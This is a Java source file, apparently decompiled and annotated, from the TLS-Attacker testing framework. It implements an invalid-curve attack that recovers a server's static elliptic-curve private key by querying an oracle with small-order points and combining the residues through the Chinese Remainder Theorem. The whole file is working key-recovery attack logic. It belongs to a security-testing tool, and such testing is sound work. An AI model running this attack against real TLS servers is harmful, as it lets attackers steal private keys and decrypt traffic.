/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.ec;

import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.attacks.ec.ICEPoint;
import de.rub.nds.tlsattacker.attacks.ec.ICEPointReader;
import de.rub.nds.tlsattacker.attacks.ec.oracles.ECOracle;
import de.rub.nds.tlsattacker.core.constants.NamedGroup;
import de.rub.nds.tlsattacker.core.crypto.ec.CurveFactory;
import de.rub.nds.tlsattacker.core.crypto.ec.EllipticCurve;
import de.rub.nds.tlsattacker.core.crypto.ec.Point;
import de.rub.nds.tlsattacker.util.MathHelper;
import java.math.BigInteger;
import java.util.Arrays;
import java.util.LinkedList;
import java.util.List;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

/**
 * Recovers a static elliptic-curve secret by querying an {@link ECOracle} with points of known, small order.
 *
 * <p>For every point returned by {@link ICEPointReader} the attacker brute-forces the secret modulo the point's order
 * by asking the oracle whether the x-coordinate of {@code k * point} matches. Since only the x-coordinate is checked,
 * each residue is known only up to sign ({@code +/- k}). The attacker therefore squares every residue, combines the
 * squares with the Chinese Remainder Theorem and takes the integer square root of the result. This only yields the
 * secret once the product of the orders exceeds its square; the bound used below is twice the bit length of the curve
 * modulus (NOTE(review): assumes the secret is smaller than the curve modulus).
 */
public class ICEAttacker {
    private static final Logger LOGGER = LogManager.getLogger();

    /** Exponent used to turn a sign-ambiguous residue {@code +/- k} into the unambiguous {@code k^2}. */
    private static final BigInteger TWO = BigInteger.valueOf(2);

    /**
     * Additional bits the moduli product must exceed in the oracle variant. Presumably a safety margin because the
     * oracle variant combines subsets of the collected equations - NOTE(review): confirm the rationale.
     */
    private static final int ORACLE_EXTRA_BITS = 4;

    /** Selects which attack strategy {@link #attack()} runs. */
    private final ServerType server;
    /** Number of congruences collected beyond the minimum in the {@link ServerType#ORACLE} variant. */
    private final int oracleAdditionalEquations;
    /** Oracle answering guesses and counting queries. */
    private final ECOracle oracle;
    /** Named group whose points are read via {@link ICEPointReader}. */
    private final NamedGroup group;
    /** Curve obtained from {@link CurveFactory} for {@link #group}. */
    private final EllipticCurve curve;

    /**
     * Creates an attacker.
     *
     * @param oracle oracle used to validate guesses
     * @param server attack strategy to use
     * @param oracleAdditionalEquations extra congruences to collect in the oracle variant
     * @param group named group of the attacked key
     */
    public ICEAttacker(ECOracle oracle, ServerType server, int oracleAdditionalEquations, NamedGroup group) {
        this.oracle = oracle;
        this.server = server;
        this.oracleAdditionalEquations = oracleAdditionalEquations;
        this.group = group;
        this.curve = CurveFactory.getCurve(group);
    }

    /**
     * Runs the attack selected by the configured {@link ServerType} and logs the elapsed time in whole seconds.
     *
     * @return the recovered secret, or {@code null} if the chosen strategy could not determine one
     */
    public BigInteger attack() {
        long startTime = System.currentTimeMillis();
        BigInteger result = null;
        switch (this.server) {
            case NORMAL:
                result = this.attackNormal();
                break;
            case ORACLE:
                result = this.attackOracle();
                break;
        }
        LOGGER.info("Time needed for the attack: {} seconds", (System.currentTimeMillis() - startTime) / 1000L);
        return result;
    }

    /**
     * Collects squared congruences (in the order returned by {@link ICEPointReader}) until the product of their moduli
     * exceeds the bound, then solves them with a single CRT.
     *
     * @return the integer square root of the CRT solution, or {@code null} if no congruence could be recovered
     */
    private BigInteger attackNormal() {
        List<ICEPoint> points = ICEPointReader.readPoints(this.group);
        List<BigInteger> congs = new LinkedList<>();
        List<BigInteger> moduli = new LinkedList<>();
        int requiredBits = this.curve.getModulus().bitLength() * 2;
        boolean boundReached = false;
        for (ICEPoint point : points) {
            BigInteger cong = this.getCongruence(point);
            if (cong == null) {
                LOGGER.info("No congruence found for point with order " + point.getOrder());
                continue;
            }
            BigInteger prodModuli = this.recordSquaredCongruence(point, cong, congs, moduli);
            if (prodModuli.bitLength() > requiredBits) {
                LOGGER.info("We have found enough congruences for computing a CRT");
                boundReached = true;
                break;
            }
        }
        if (congs.isEmpty()) {
            LOGGER.warn("No congruence could be recovered, unable to compute a result");
            return null;
        }
        if (!boundReached) {
            // The CRT result is only guaranteed to equal x^2 once the moduli product exceeds the bound.
            LOGGER.warn("Not enough congruences found for a reliable CRT, the computed result is probably incorrect");
        }
        BigInteger sqrtResult = MathHelper.CRT(congs, moduli);
        BigInteger result = MathHelper.bigIntSqRootFloor(sqrtResult);
        LOGGER.info("Result found: {}", result);
        LOGGER.info("Number of server queries: {}", this.oracle.getNumberOfQueries());
        return result;
    }

    /**
     * Collects squared congruences (iterating the points in reverse order) until the moduli product exceeds the bound
     * plus {@link #ORACLE_EXTRA_BITS}, then keeps collecting {@link #oracleAdditionalEquations} more. Afterwards every
     * subset with as many congruences as were needed to reach the bound is tried, and each candidate is checked with
     * {@link ECOracle#isFinalSolutionCorrect}.
     *
     * @return the secret confirmed by the oracle, or {@code null} if none was confirmed
     */
    private BigInteger attackOracle() {
        List<ICEPoint> points = ICEPointReader.readPoints(this.group);
        List<BigInteger> congs = new LinkedList<>();
        List<BigInteger> moduli = new LinkedList<>();
        int requiredBits = this.curve.getModulus().bitLength() * 2 + ORACLE_EXTRA_BITS;
        // Number of congruences collected when the moduli product first exceeded the bound; -1 while not reached.
        int baseEquations = -1;
        for (int i = points.size() - 1; i >= 0; --i) {
            ICEPoint point = points.get(i);
            BigInteger cong = this.getCongruence(point);
            if (cong == null) {
                LOGGER.info("No congruence found for point with order " + point.getOrder());
                continue;
            }
            BigInteger prodModuli = this.recordSquaredCongruence(point, cong, congs, moduli);
            if (prodModuli.bitLength() <= requiredBits) {
                continue;
            }
            LOGGER.info("We have found enough congruences for computing a CRT, computing additional equations");
            if (baseEquations < 0) {
                baseEquations = moduli.size();
            }
            if (moduli.size() - baseEquations == this.oracleAdditionalEquations) {
                break;
            }
        }
        if (moduli.isEmpty()) {
            LOGGER.warn("No congruence could be recovered, unable to compute a result");
            return null;
        }
        // Size the subsets from what was actually collected: if the points ran out early, there are fewer extra
        // equations than configured, and subtracting oracleAdditionalEquations would make the subsets too small
        // (or even empty/negative).
        int combinationSize = baseEquations < 0 ? moduli.size() : baseEquations;
        int[] usedOracleEquations = this.initializeUsedOracleEquations(combinationSize);
        BigInteger[] congsArray = ArrayConverter.convertListToArray(congs);
        BigInteger[] moduliArray = ArrayConverter.convertListToArray(moduli);
        BigInteger result = this.bruteForceWithAdditionalOracleEquations(usedOracleEquations, congsArray, moduliArray,
                usedOracleEquations.length - 1);
        if (result != null) {
            LOGGER.info("Result found: {}", result);
            LOGGER.info("Number of server queries: {}", this.oracle.getNumberOfQueries());
        } else {
            LOGGER.info("Unfortunately, no result found. Try to increase the number of additional equations.");
        }
        return result;
    }

    /**
     * Recursively enumerates strictly increasing index combinations and returns the first candidate secret the oracle
     * confirms.
     *
     * <p>The entry at position {@code pointer} ranges from its current value up to, but excluding, the value at
     * position {@code pointer + 1} ({@code congs.length} for the last position). Lower positions are enumerated
     * recursively. Each complete combination is solved via CRT, and the integer square root of the solution is
     * submitted to the oracle.
     *
     * @param usedOracleEquations starting combination of indices into {@code congs}/{@code modulis}; not modified
     * @param congs squared congruences
     * @param modulis moduli belonging to {@code congs}
     * @param pointer position currently being enumerated; callers start with {@code usedOracleEquations.length - 1}
     * @return the first candidate confirmed by the oracle, or {@code null} if no combination is confirmed
     * @throws IllegalArgumentException if {@code pointer} is not a valid index into {@code usedOracleEquations}
     */
    public BigInteger bruteForceWithAdditionalOracleEquations(int[] usedOracleEquations, BigInteger[] congs,
            BigInteger[] modulis, int pointer) {
        if (pointer < 0 || pointer >= usedOracleEquations.length) {
            throw new IllegalArgumentException("Invalid pointer " + pointer + " for a combination of size "
                    + usedOracleEquations.length);
        }
        // Work on a copy so sibling branches of the recursion do not see each other's choices.
        int[] combination = Arrays.copyOf(usedOracleEquations, usedOracleEquations.length);
        int maxValue = pointer == usedOracleEquations.length - 1 ? congs.length : usedOracleEquations[pointer + 1];
        for (int i = usedOracleEquations[pointer]; i < maxValue; ++i) {
            combination[pointer] = i;
            BigInteger candidate;
            if (pointer > 0) {
                // Propagate a success from deeper levels instead of discarding it.
                candidate = this.bruteForceWithAdditionalOracleEquations(combination, congs, modulis, pointer - 1);
            } else {
                LOGGER.debug("Trying the following combination: {}", Arrays.toString(combination));
                // Solve the combination that was actually built, not the starting one.
                BigInteger sqrtResult = this.computeCRTFromCombination(combination, congs, modulis);
                BigInteger guess = MathHelper.bigIntSqRootFloor(sqrtResult);
                LOGGER.info("Guessing the following result: {}", guess);
                candidate = this.oracle.isFinalSolutionCorrect(guess) ? guess : null;
            }
            if (candidate != null) {
                return candidate;
            }
        }
        return null;
    }

    /**
     * Solves the CRT over the congruences selected by the given indices.
     *
     * @param usedOracleEquations indices into {@code congs}/{@code modulis}
     * @param congs all squared congruences
     * @param modulis all moduli
     * @return the CRT solution of the selected congruences
     */
    private BigInteger computeCRTFromCombination(int[] usedOracleEquations, BigInteger[] congs, BigInteger[] modulis) {
        BigInteger[] usedCongs = new BigInteger[usedOracleEquations.length];
        BigInteger[] usedModulis = new BigInteger[usedOracleEquations.length];
        for (int i = 0; i < usedOracleEquations.length; ++i) {
            usedCongs[i] = congs[usedOracleEquations[i]];
            usedModulis[i] = modulis[usedOracleEquations[i]];
        }
        return MathHelper.CRT(usedCongs, usedModulis);
    }

    /**
     * Builds the first combination {@code {0, 1, ..., size - 1}}.
     *
     * @param size number of indices in the combination
     * @return the identity combination of the given size
     */
    private int[] initializeUsedOracleEquations(int size) {
        int[] usedEquations = new int[size];
        for (int i = 0; i < usedEquations.length; ++i) {
            usedEquations[i] = i;
        }
        return usedEquations;
    }

    /**
     * Squares a recovered residue, appends it and its modulus to the given lists and logs both equations.
     *
     * @param point point whose order is the modulus
     * @param cong residue {@code k} recovered for {@code point} (known only up to sign)
     * @param congs list receiving {@code k^2 mod order}
     * @param moduli list receiving the order of {@code point}
     * @return the product of all moduli collected so far
     */
    private BigInteger recordSquaredCongruence(ICEPoint point, BigInteger cong, List<BigInteger> congs,
            List<BigInteger> moduli) {
        BigInteger mod = BigInteger.valueOf(point.getOrder());
        BigInteger squareCong = cong.modPow(TWO, mod);
        congs.add(squareCong);
        moduli.add(mod);
        LOGGER.info("Successfully found: x = +/- {} mod {}", cong, point.getOrder());
        LOGGER.info("Using equation: x^2 =   {} mod {}", squareCong, point.getOrder());
        return this.computeModuliProduct(moduli);
    }

    /**
     * Finds the smallest {@code k} in {@code [1, order)} for which the oracle confirms the x-coordinate of
     * {@code k * point}. One oracle query is made per candidate.
     *
     * @param point point of known order
     * @return the first confirmed {@code k}, or {@code null} if the oracle confirms none
     */
    private BigInteger getCongruence(ICEPoint point) {
        for (int i = 1; i < point.getOrder(); ++i) {
            BigInteger candidate = BigInteger.valueOf(i);
            Point guess = this.curve.mult(candidate, point);
            if (this.oracle.checkSecretCorrectnes(point, guess.getX().getData())) {
                return candidate;
            }
        }
        return null;
    }

    /**
     * Multiplies all moduli.
     *
     * @param moduli moduli to multiply
     * @return their product ({@link BigInteger#ONE} for an empty list)
     */
    private BigInteger computeModuliProduct(List<BigInteger> moduli) {
        BigInteger prodModuli = BigInteger.ONE;
        for (BigInteger mod : moduli) {
            prodModuli = prodModuli.multiply(mod);
        }
        return prodModuli;
    }

    /** Attack strategy selector. */
    public static enum ServerType {
        /** A single CRT over the minimum number of congruences. */
        NORMAL,
        /** Collects extra congruences and tries subsets, verifying each candidate with the oracle. */
        ORACLE;

    }
}

